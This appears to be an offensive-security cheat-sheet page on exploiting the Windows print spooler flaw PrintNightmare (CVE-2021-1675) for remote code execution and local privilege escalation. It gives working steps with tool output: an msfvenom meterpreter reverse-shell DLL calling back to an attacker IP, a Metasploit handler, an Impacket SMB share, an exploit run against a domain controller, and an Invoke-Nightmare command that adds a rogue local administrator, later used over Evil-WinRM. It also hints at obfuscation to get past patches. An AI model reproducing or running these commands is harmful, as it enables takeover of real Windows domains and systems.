PrintNightmare (CVE-2021-1675) - RCE

  • Takes advantage of printer spooler that runs as sys priv

  • Check if our target is vulnerable @DOMAIN-CONTROLLER-IP | egrep 'MS-RPRN|MS-PAR'

  • Create a malicious dll to run it along the py file from the resource msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKING-MACHINE-IP LPORT=4444 -f dll > shell.dll

    └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll > shell.dll                                                                                                           2 ⨯
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder specified, outputting raw payload
    Payload size: 510 bytes
    Final size of dll file: 8704 bytes
  • run msfconsole to catch the shell use multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST and LPORT

  • setup a file share with (Impacket): share 'pwd' -smb2support (will share current working dir)

  • Run the exploit python3 domain.local/username:password@DOMAIN-CONTROLLER-IP-ADD '\\ATTACKING-MACHINE-IP\share\shell.dll'

  • We should get a shell

Note: With patches it might be necessary to use obfuscations techniques

PrintNightmare - LPE

  • Create an user admin from the compromised machine:

*Evil-WinRM* PS C:\Users\user\Documents> Import-Module .\CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\user\Documents> Invoke-Nightmare -NewUser "adminhackr" -NewPassword "adminhackr1!" -DriverName "PrintMe"
[+] created payload at C:\Users\user\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_19a3fe50fa9a21b6\Amd64\mxdwdrv.dll"
[+] added user adminhackr as local administrator
[+] deleting payload from C:\Users\user\AppData\Local\Temp\nightmare.dll
  • We launch evilwinrm with this new user and we have an admin shell:

└─$ proxychains evil-winrm -i -u adminhackr -p adminhackr1!                                                                                                                               76 ⨯
Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

[proxychains] Dynamic chain  ...  ...  ...  OK
*Evil-WinRM* PS C:\Users\adminhackr\Documents> 

PrintNightmare - Resources

Last updated